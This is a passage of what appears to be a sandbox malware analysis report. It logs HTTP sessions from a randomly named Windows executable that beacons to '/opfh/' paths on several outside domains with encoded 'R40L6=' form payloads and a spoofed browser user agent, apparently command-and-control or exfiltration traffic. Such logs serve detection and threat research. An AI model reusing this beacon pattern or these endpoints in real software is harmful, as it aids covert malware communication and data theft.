#2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:20:57.289266109 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjhkZDhmYTgtYzhiNi00ZTlmLWEyMTktZTgyNzJmMjE0NzExIiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	63173	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:59.368424892 CEST	457	OUT	GET /opfh/?R40L6=ZzDSVGEFmA6bbFgWUPABJOqYyGy556P6SvdRpmz0pldrPkLsuzUuLHkKP8ebqy61OUsJ3I6Wp1cSjumXpsr68z/GSQBLa7X+Wj1CzMiNU/mDF53obi6xM6x1cOBV2RrPtvioQYdy1WMq&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.swordshoop.ca Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:20:59.824805021 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:20:59 GMT content-type: text/html; charset=utf-8 content-length: 1518 x-request-id: 0a9926c8-754a-4ab9-b46f-0f7c14dc2cb0 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_z3aFx855oL1OSsOkLQFd4EjwYH+1CT1qCI/8uVLnR2p9XgVtCESTAZ9y/v3DTjp/+FwDfonSilK8e7+Totre1w== set-cookie: parking_session=0a9926c8-754a-4ab9-b46f-0f7c14dc2cb0; expires=Mon, 27 May 2024 10:35:59 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 33 61 46 78 38 35 35 6f 4c 31 4f 53 73 4f 6b 4c 51 46 64 34 45 6a 77 59 48 2b 31 43 54 31 71 43 49 2f 38 75 56 4c 6e 52 32 70 39 58 67 56 74 43 45 53 54 41 5a 39 79 2f 76 33 44 54 6a 70 2f 2b 46 77 44 66 6f 6e 53 69 6c 4b 38 65 37 2b 54 6f 74 72 65 31 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_z3aFx855oL1OSsOkLQFd4EjwYH+1CT1qCI/8uVLnR2p9XgVtCESTAZ9y/v3DTjp/+FwDfonSilK8e7+Totre1w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:20:59.824830055 CEST	971	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE5OTI2YzgtNzU0YS00YWI5LWI0NmYtMGY3YzE0ZGMyY2IwIiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	63174	212.227.172.253	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:04.958076954 CEST	720	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.fruitique.co.uk Origin: http://www.fruitique.co.uk Referer: http://www.fruitique.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 74 6b 46 38 57 45 62 39 48 43 36 55 4b 36 6b 38 77 58 4c 79 31 5a 58 33 2f 42 64 6b 37 63 78 48 64 44 62 37 67 4f 64 34 57 67 65 72 66 71 67 79 6f 38 58 53 65 41 77 61 65 4b 33 65 75 74 46 6d 68 66 66 52 72 75 74 44 7a 4d 31 7a 33 33 4d 54 57 52 73 42 61 41 4d 57 79 35 63 52 36 2f 6f 4f 56 72 6b 51 4d 59 63 30 4e 49 32 63 4d 31 31 5a 57 44 75 54 52 64 59 2f 61 6d 39 51 41 38 77 66 50 2b 73 65 2f 62 4e 48 38 55 45 6c 32 4d 6a 59 4b 45 4d 79 6a 57 34 6d 2f 6d 39 77 43 48 4a 33 34 49 48 4b 4a 63 48 5a 39 54 31 79 6e 31 79 39 57 5a 52 35 54 71 30 48 62 51 79 2f 71 72 71 35 34 55 66 50 76 61 64 6b 76 78 68 61 6d 41 5a 72 43 51 3d 3d Data Ascii: R40L6=tkF8WEb9HC6UK6k8wXLy1ZX3/Bdk7cxHdDb7gOd4Wgerfqgyo8XSeAwaeK3eutFmhffRrutDzM1z33MTWRsBaAMWy5cR6/oOVrkQMYc0NI2cM11ZWDuTRdY/am9QA8wfP+se/bNH8UEl2MjYKEMyjW4m/m9wCHJ34IHKJcHZ9T1yn1y9WZR5Tq0HbQy/qrq54UfPvadkvxhamAZrCQ==
May 27, 2024 12:21:05.581367016 CEST	427	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:21:05 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.fruitique.co.uk/opfh/ Expires: Mon, 27 May 2024 10:41:05 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	63175	212.227.172.253	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:09.206199884 CEST	740	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.fruitique.co.uk Origin: http://www.fruitique.co.uk Referer: http://www.fruitique.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 74 6b 46 38 57 45 62 39 48 43 36 55 4b 5a 38 38 78 30 6a 79 67 4a 58 32 36 42 64 6b 78 38 78 44 64 44 58 37 67 4b 74 6f 57 53 4b 72 66 50 63 79 70 35 72 53 66 41 77 61 57 71 33 68 6a 4e 46 39 68 66 61 73 72 72 56 44 7a 49 6c 7a 33 32 38 54 57 6d 78 58 62 51 4d 49 2f 5a 63 50 6e 76 6f 4f 56 72 6b 51 4d 63 38 4e 4e 49 75 63 4d 46 46 5a 5a 43 75 51 53 64 59 2b 54 47 39 51 54 73 77 68 50 2b 73 73 2f 61 52 2b 38 58 38 6c 32 4d 54 59 4b 57 30 31 70 57 34 67 78 47 38 41 4f 69 34 36 2b 37 4c 42 4f 39 2f 68 2f 51 74 76 72 6a 76 66 4d 37 64 56 4e 37 4d 38 66 53 57 4a 39 4e 33 4d 36 56 62 58 69 34 70 46 77 47 45 77 72 53 34 76 55 70 64 42 43 2b 39 50 53 36 33 59 65 6a 66 50 45 59 46 37 35 68 51 3d Data Ascii: R40L6=tkF8WEb9HC6UKZ88x0jygJX26Bdkx8xDdDX7gKtoWSKrfPcyp5rSfAwaWq3hjNF9hfasrrVDzIlz328TWmxXbQMI/ZcPnvoOVrkQMc8NNIucMFFZZCuQSdY+TG9QTswhP+ss/aR+8X8l2MTYKW01pW4gxG8AOi46+7LBO9/h/QtvrjvfM7dVN7M8fSWJ9N3M6VbXi4pFwGEwrS4vUpdBC+9PS63YejfPEYF75hQ=
May 27, 2024 12:21:09.912512064 CEST	427	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:21:09 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.fruitique.co.uk/opfh/ Expires: Mon, 27 May 2024 10:41:09 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	63176	212.227.172.253	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:11.738023043 CEST	1753	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.fruitique.co.uk Origin: http://www.fruitique.co.uk Referer: http://www.fruitique.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 74 6b 46 38 57 45 62 39 48 43 36 55 4b 5a 38 38 78 30 6a 79 67 4a 58 32 36 42 64 6b 78 38 78 44 64 44 58 37 67 4b 74 6f 57 53 53 72 59 35 49 79 70 65 2f 53 4e 77 77 61 58 71 33 67 6a 4e 46 38 68 66 69 67 72 72 51 2b 7a 4b 74 7a 32 55 30 54 51 53 46 58 56 51 4d 49 32 35 63 4f 36 2f 6f 62 56 72 30 63 4d 59 59 4e 4e 49 75 63 4d 48 64 5a 64 54 75 51 55 64 59 2f 61 6d 39 55 41 38 78 4d 50 2b 30 38 2f 61 46 75 38 6d 63 6c 32 73 44 59 47 44 59 31 30 6d 34 69 32 47 38 59 4f 69 39 36 2b 39 75 34 4f 39 4c 50 2f 53 74 76 70 6d 72 47 63 4c 49 43 66 6f 31 6f 66 69 79 77 32 62 61 35 30 46 6e 65 74 71 4a 53 74 32 39 4a 75 7a 34 5a 58 75 51 51 54 74 4e 62 53 35 7a 4d 49 44 69 4b 55 34 42 65 36 6c 4e 75 6b 5a 53 6f 76 52 5a 6c 6c 35 45 68 39 4d 51 36 45 32 7a 55 47 73 59 2b 65 63 44 69 4e 37 47 67 43 32 6c 45 4f 31 67 41 68 69 64 2b 68 37 62 52 4f 39 5a 73 7a 5a 6f 46 54 41 79 4d 48 41 46 4f 75 42 76 68 51 57 6c 46 52 38 6e 6c 54 75 46 5a 77 4e 6f 33 6c 72 56 78 61 36 71 4a 62 58 4f 31 66 6a 6a 64 [TRUNCATED] Data Ascii: R40L6=tkF8WEb9HC6UKZ88x0jygJX26Bdkx8xDdDX7gKtoWSSrY5Iype/SNwwaXq3gjNF8hfigrrQ+zKtz2U0TQSFXVQMI25cO6/obVr0cMYYNNIucMHdZdTuQUdY/am9UA8xMP+08/aFu8mcl2sDYGDY10m4i2G8YOi96+9u4O9LP/StvpmrGcLICfo1ofiyw2ba50FnetqJSt29Juz4ZXuQQTtNbS5zMIDiKU4Be6lNukZSovRZll5Eh9MQ6E2zUGsY+ecDiN7GgC2lEO1gAhid+h7bRO9ZszZoFTAyMHAFOuBvhQWlFR8nlTuFZwNo3lrVxa6qJbXO1fjjdS07uca+nitDvfEDOJ2Opv9fABI7x3RsTTnA4hVSm2KesNxWKF37oyo7Q5QVaXGx87MwONDwBj7k8yr9VeHuaGMSDw256p1AIan/RjqI0Iij2dY56gTrjEUBjKRovXAambo/3vocLRZhUkD+pH7N7IeiWAnP0ZP9wSom4hh0Bsx2IhfwrdzwZuy+b+cThhbopMIS4xLdsHeK77KWdf79Yw0YZBHTpWjnzxmCtH4T79yUaWj8pi9nGDZ5pvf+UJuNxp6LrNmfac6w600osphRkZgl//cahb0oNRjikBLAnoNwRjLQ5vbiHXQcezUG7QV/8B8jInuxgTSkrJNW0Gm/fqi1qZHoNobkazNvqKuMC8OCJ6KJ46pAboF+kuJvIaR4ofcSprNyjLSXEzDoPa9AxIoKxY9po5MvzFyiwjTHAaesXEnY92kTe9Q9F7Gx4df6+Cpdz6r/xKSBXkrAqhUtVzYaSle63xZjafCrxA/MNH5PENXCqxyNNTwJ+sEyhNbfDsuOXJyJNUiHEPQTSzYuNh7U9GXeK4oFwloUl7vCExEcwRMp2cENqsThwflKo1BSk0256xQdkL2l4SIISvPSmYoA2EaEVw6Y4PoC49aGSsBsjstGPPSz8ztBdCTSH1oR2lWlEfYGHLMnIzSMywetBWB6Tt5PbxVp71C [TRUNCATED]
May 27, 2024 12:21:12.391423941 CEST	427	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:21:12 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.fruitique.co.uk/opfh/ Expires: Mon, 27 May 2024 10:41:12 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	63177	212.227.172.253	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:14.380304098 CEST	459	OUT	GET /opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.fruitique.co.uk Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:21:15.017391920 CEST	592	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:21:14 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.fruitique.co.uk/opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04 Expires: Mon, 27 May 2024 10:41:14 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	63178	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:20.238209963 CEST	714	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.gamemaster.at Origin: http://www.gamemaster.at Referer: http://www.gamemaster.at/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 43 41 53 63 36 39 66 66 36 66 4b 2f 49 45 71 55 2b 31 33 42 5a 41 42 32 39 46 51 41 55 65 5a 7a 32 70 30 41 4a 65 37 4c 53 6b 70 41 32 52 66 4a 48 39 75 6d 4c 69 30 5a 2f 4e 48 6e 78 6c 51 58 46 68 49 55 59 49 6e 4b 6b 64 6a 4d 47 50 54 4d 62 46 6e 31 33 56 78 70 78 65 78 4c 78 73 2b 68 4d 63 55 77 48 63 72 46 45 37 6b 7a 39 5a 66 70 32 7a 44 6d 2f 55 7a 51 42 4f 4f 45 67 71 39 78 67 43 54 62 4d 78 72 45 65 48 64 4a 7a 43 39 39 39 66 42 6a 4c 68 73 79 35 48 33 62 4d 73 76 4e 67 75 74 6d 6b 73 43 71 78 36 61 58 61 52 63 6f 61 71 45 46 6d 5a 45 71 44 32 46 38 39 6c 70 62 30 52 6c 51 44 2f 74 50 4b 77 5a 50 59 57 4e 57 72 77 3d 3d Data Ascii: R40L6=CASc69ff6fK/IEqU+13BZAB29FQAUeZz2p0AJe7LSkpA2RfJH9umLi0Z/NHnxlQXFhIUYInKkdjMGPTMbFn13VxpxexLxs+hMcUwHcrFE7kz9Zfp2zDm/UzQBOOEgq9xgCTbMxrEeHdJzC999fBjLhsy5H3bMsvNgutmksCqx6aXaRcoaqEFmZEqD2F89lpb0RlQD/tPKwZPYWNWrw==
May 27, 2024 12:21:20.718554020 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:20 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: a66b88cb-78eb-4e66-b3d8-e223d5bd09b7 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug== set-cookie: parking_session=a66b88cb-78eb-4e66-b3d8-e223d5bd09b7; expires=Mon, 27 May 2024 10:36:20 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 51 2b 56 45 77 70 44 74 72 72 72 54 4a 72 7a 35 56 39 56 74 33 37 54 61 53 74 62 2b 76 68 61 2f 51 37 4e 66 32 32 46 38 6b 39 49 61 2b 7a 51 47 47 5a 76 71 74 4e 4f 48 35 44 48 71 6c 6a 47 50 79 63 79 73 79 51 63 77 43 33 5a 52 49 2b 64 32 37 4d 47 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:20.718710899 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTY2Yjg4Y2ItNzhlYi00ZTY2LWIzZDgtZTIyM2Q1YmQwOWI3IiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	63179	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:22.771965981 CEST	734	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.gamemaster.at Origin: http://www.gamemaster.at Referer: http://www.gamemaster.at/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 43 41 53 63 36 39 66 66 36 66 4b 2f 49 6b 36 55 38 58 66 42 4d 51 42 35 34 46 51 41 64 2b 5a 33 32 70 6f 41 4a 62 58 62 53 57 4e 41 78 77 76 4a 45 35 61 6d 4d 69 30 5a 30 74 48 59 2f 46 51 41 46 68 45 6d 59 4a 62 4b 6b 65 66 4d 47 4f 6a 4d 62 79 54 32 33 46 78 76 35 2b 78 4a 2f 4d 2b 68 4d 63 55 77 48 63 2b 51 45 2f 49 7a 39 6f 76 70 